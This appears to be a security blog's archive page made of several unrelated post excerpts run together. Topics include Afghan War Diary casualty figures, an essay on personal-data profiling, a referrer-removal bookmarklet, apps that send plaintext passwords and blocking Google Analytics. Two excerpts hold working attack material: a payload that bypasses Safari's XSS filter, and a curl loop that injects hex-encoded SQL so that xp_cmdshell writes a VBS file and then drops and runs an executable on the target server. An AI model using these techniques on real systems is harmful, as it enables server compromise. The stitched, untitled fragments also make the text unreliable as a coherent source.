In this post I present this endless insane war in numbers. All numbers were taken from "Afgan War Diary" and manipulated using a MySQL database. It must be noted that 75.000 over 91.000 reports were released.

Section 1-Civilians Killed In Action
2004: 219 were killed

2005: 178 were killed

2006: 800 were killed

2007: 758 were killed

2008: 798 were killed

2009: 1241 were killed

Total civilians were killed during the period 2004-2009: 3994

Section 2-Civilians Wounded In Action
2004: 208 were wounded

2005: 454 were wounded

2006: 1794 were wounded

2007: 1962 were wounded

2008: 1980 were wounded

2009: 2646 were wounded

Total civilians were wounded during the period 2004-2009: 9044

Section 3-Enemies Killed In Action
2004: 343 were killed
2005: 890 were killed
2006: 2689 were killed
2007: 4044 were killed
2008: 2816 were killed
2009: 4437 were killed

Total enemies were killed during the period 2004-2009: 15219

Section 4-Enemies Wounded In Action
2004: 93 were wounded
2005: 200 were wounded
2006: 252 were wounded
2007: 377 were wounded
2008: 285 were wounded
2009: 617 were wounded

Total enemies were wounded during the period 2004-2009: 1824

Section 5-Friendly Killed In Action
2004: 22 were killed
2005: 71 were killed
2006: 142 were killed
2007: 186 were killed
2008: 244 were killed
2009: 481 were killed

Total friendly were killed during the period 2004-2009: 1146

Section 6-Friendly Wounded In Action
2004: 133 were wounded
2005: 480 were wounded
2006: 1083 were wounded
2007: 1652 were wounded
2008: 1255 were wounded
2009: 2693 were wounded

Total friendly were wounded during the period 2004-2009: 7296

Section 7-HostNation Killed In Action
2004: 218 were killed
2005: 180 were killed
2006: 605 were killed
2007: 951 were killed
2008: 699 were killed
2009: 1143 were killed

Total HostNations were killed during the period 2004-2009: 3796

Section 8-HostNation Wounded In Action
2004: 316 were wounded
2005: 504 were wounded
2006: 1379 were wounded
2007: 2093 were wounded
2008: 1749 were wounded
2009: 2444 were wounded

Total HostNations were wounded during the period 2004-2009: 8503

Total Killed: 24155
Total Wounded: 26667

Such an approach could be (ab)used if we continue to fail to apply strong data confidentiality and true segregation of duties.

Controls within organizations and governments are not adequate. End user education regarding disclosure of personal data is also essential.

In the domain of object-oriented programming an object is usually taken to mean a compilation of attributes (object elements) and behaviors (methods or subroutines) encapsulating an entity. In this way, whilst primitive or simple data types are still just single pieces of information, object oriented objects are complicated types that have multiple pieces of information and specific properties (or attributes).

Concept Analysis

Below is an oversimplified attempt to describe the implementation of a Human class. Technologies capable for correlating and capturing data are already in place. So lets start our "fictional" scenario!

1. Welcome to Life

A Human gets borned (instantiation of class Human -> HumanXYZ). Once a new Human is borned it automatically acquires an ID.

A Human's first ID card  consists of at least the following personal attributes:

• Sex
• Weight
• Religion
• Time of Birth and location
• Summary of health
• Your doctor name
• The National ID of your physical parent (this points back to number 1 for the specified person reference key cannot be NULL)
• Country of residence and registered address
• Temporary eye color
• Race categorization
• FOR FUTURE USE (marketing/recruitment etc...) : DNA analysis may also provide: Expected life time, probabolities of illness, mental capabilities etc..

Because an infant's health during its first couple of years of life is unstable (due to body adaptation to earth environment hazards) the infant will have several visits to a hospital/doctor.

By the time a Human reaches pre-school age the main data holder is the health care system and some government body.

2. Develop

Getting an education at an early age is common for developed countries and is considered de facto. Other information a Human has acquired by the time it reaches the age of 15:

• National ID card
• RFID Passport (For your convenience)
• Education progress (how well the human is performing in acquiring predefined knowledge and other behavior characteristics)
• Google/Hotmail/Yahoo mail . Geolocation based on IP and association with mobile number required by Google mail !
• Social network account. Geolocation based on triangulation/GPS/IP
• Mobile number. Geolocation based on triangulation/GPS/IP
• School ID, other associations
• Bank account (prospect customer data)
• Possible criminal record
• Internet access
• Mobile customers are required to provide formal proof of ID

So stage 2 data holders are:

Goverment, mobile operators, multinational corporations, financial institutions your local store or dealer

3. Locking in

• Biometric Data uniquely identifies a person
• Getting a public transportation card
• Buying a vehicle and issuing a vehicle insurance
• Acquiring a credit card and carrying out online or offline purchases
• University/college education
• DNA test (if DNA data has not been captured during birth)
• CCTV images

All of the above data is already being used by a large number of companies (commercial or government owned). Either for marketing or for other reasons.

Lets assume now that big goverment/coorporation X is suddenly interested into PersonXYZ for XYZ reasons.

Lets see if we can find out who PersonXYZ and his latest location!

1. Create psycological profile and social trends of PersonXYZ. We will use metadata analysis from correlated data from  Stage 1 and 2 data holders

Data include:

• E-mail
• Social networking activity
• Communication patterns with other Person instances. Run analysis 1 for each connected entity
• Create status profile
• Ascribed status
• Achieved status

All we need is a good team with skills in the following disciplines:

1. Mathematics
2. Statistics
3. Sociology
4. Psychology

One might be thinking why would anyone want to find out so much about a person. Some possible reasons are:

• Recruitment
• Suspect for terrorism
• Human behavior profile matching
• Research
• Marketing
• .....

What you end up is a full profile of a Human Instance describing :

• Where this person is
• Where he has been
• Who he talked to
• What are his habits
• What are his needs
• Who this person and his environment are
• What type of a person is

By running an analysis on the above data, it is possible to profile a person and his character. Chances are that they know better than you who you are!

Information Custodians

Some of the required data is public, some of the more confidential data is private and access may be somewhat more difficult to obtain. Where private data is kept most of the times there is already a regulation controlling access. Off course under specific circumstances access to such data may be obtained , although it may not be "legal". So where do we need to apply strict regulations regarding confidentiality and access control?

1. Health care system
2. Governmental system
3. Various private organisations
4. Financial institutions
5. Internet providers
6. Academic institutions
7. Telecom providers

****Cardholder data and transactions automatically correlate other information such as travel/lifestyle etc...

All of the above organisations must implement technologies which monitor and capture reliably all access to one Person's data. A Person must have the ability to query any of the above entities and they should be obliged to provide a report to the data owner (the actual person) showing :

• Who accessed their data
• What kind of data the entity holds

You might be wondering how could one entity have access to all this data, which essentially belongs to different entities. Corp X would never give its data to Corp Y. This is actually true.

However globalization plans getting into place, you might find out that several different corporations basically are being controlled/owned by the same people. Don't forget that corporations and specific strong lobbies, are essentially controlling the governments.

Controlling the controller

The following requirements must be fulfilled in order to ensure the successful operation of protecting privacy rights.

• The regulatory body must be sponsored by the people
• The regulatory body will be an independent organization belonging to the people
• All actions/decisions/financial information of the body must be published
• Control audits must be made public

All rights reserved

A global Person database is not far from happening , one way or the other. It already exists. Running a method such as getPrivateData() will soon be possible. The developed world has managed to put an "All rights reserved" license on your personal data and the different organizations/government as the legal copyright owner.

You might be wondering how did they managed to get the legal rights to your personal data without your consent. Well you will find out that at some point you have signed a paper/ticked a checkbox which maybe not explicitly, but implicitly says that your private data is no longer under your control.

What would happen if you denied to give up your rights ? Most likely you would not be able to get medical care, no right to vote, no right to make any legal claims etc. Even worse you would probably be first level suspect for "terrorism".

Some of the questions that arise from all this are:

• Can we really control the controller?
• Is it possible to identify reliable at any time who had access to my data?
• I want full anonymity, can I have it?
• Can we prevent correlation of personal data?

Imagine a world where real private information is never shown or used. All services are based on alias IDs but special protocols are used to attest that the alias is actually a "legal" instance of a HuMAn.

for(var i=0;i<document.getElementsByTagName("a").length;i++){
document.getElementsByTagName("a")[i].removeAttribute("onmousedown");
document.getElementsByTagName("a")[i].removeAttribute("onmouseover");
document.getElementsByTagName("a")[i].removeAttribute("onclick")
;document.getElementsByTagName("a")[i].setAttribute("onclick","
document.location='data:text/html;charset=utf-8,%3C%21DOCTYPE%20html%3E%3Chtml%3E%3Cscript%3Edocument.location%3D%27'+
escape(event.currentTarget.href)+'%27%3B%3C%2fscript%3E%3C%2fhtml%3E';return false;");
}

Which can be turned into the following bookmarklet: Remove Referrer

Using the same code I've also made a Safari 5 extension which can be downloaded from here: Referrer Remove
The extensions adds a context menu called "Remove Referrer" that can be found by right-clicking on a page.
Note: You will need to enable the extensions.

XSS Auditor: Safari can filter potentially malicious scripts used in cross-site scripting (XSS) attacks.

Indeed Safari 5 does manage to block the usual "><script>alert(0)</script> javascript successfully:

However it took me just under a couple of minutes to discover that the following bypassed the filter just fine:

"><img src=aa onerror=alert(0)

(Notice I haven't closed the tag or used quotes).

The script also supports using cookies for better crawling of sites that require authentication. The cookies can be added in the first few lines of the script (no command line switch yet).

Just as a test I used the common.txt wordlist found in dirb to scan one of my sites. The scan did not include any extensions and discovered 25 directories. I run dict_populator against the site making it append the discovered names in the above wordlist and then run dirb again. This time 34 directories where discovered.

Download: dict_populator.pl
Requires: LWP::UserAgent, HTTP::Cookies and HTML::LinkExtor.

Updated to version 0.2, which fixes a bug that multiple image URL's appear in the output.

- Tweetdeck (version: 1.3): Uses http with basic authentication.

- Waze (version: 1.7.0): Uses http, password is plain-text.

- Ustream Live Broadcaster (version: 1.2): Uses http, password is plain-text.

- FriFi (version: 1.6): Uses its own protocol, password is plain-text. The application also transmits the users phone number to the FriFi servers.

- Knocking Vid (version: 1.2.1): Uses http, password is base64 encoded.

- Gowalla (version: 2.2.1): Uses http with basic authentication. (More info at Martin Kou's Blog)

- Foursquare (version: 1.9.1): Uses http with basic authentication. (More info at Martin Kou's Blog)

This list will be updated, whenever I find an application that transmits sensitive information using "unsafe" protocols.

What you need:
- a web server
- place the two files in this file in the root of the web server
- edit your hosts file and add this entry (where xxx.xxx.xxx.xxx is the IP of your web server):
xxx.xxx.xxx.xxx www.google-analytics.com ssl.google-analytics.com

Now every time you visit an analytics-enabled page, the two files from your web server will be included, and all javascript will be executed properly, but google will not track you.

The second tool can be used in an SQL injection scenario, and will take as input the file generated from the previous tool. Its output will be a number of SQL hex strings (that will run xp_cmdshell to output the file in the %TEMP% directory), that can be used as follows:
for line in `./file_to_sqlhex.php notepad.vbs`; do curl -I "http://injectable.site/sql.asp?query=declare%20@q%20nvarchar(4000);select%20@q=$line;exec(@q);"; done
When the above is execute it will generate the notepad.vbs file in %TEMP%. The tool also has a duplicate line detection, avoiding possible overwrites of the file. The vbs can then be easily executed using xp_cmdshell (exec master..xp_cmdshell 'cscript %TEMP%\notepad.vbs //B //Nologo') and will create the exe file in the %TEMP% directory.

Download: exe_to_vb.php
Download: file_to_sqlhex.php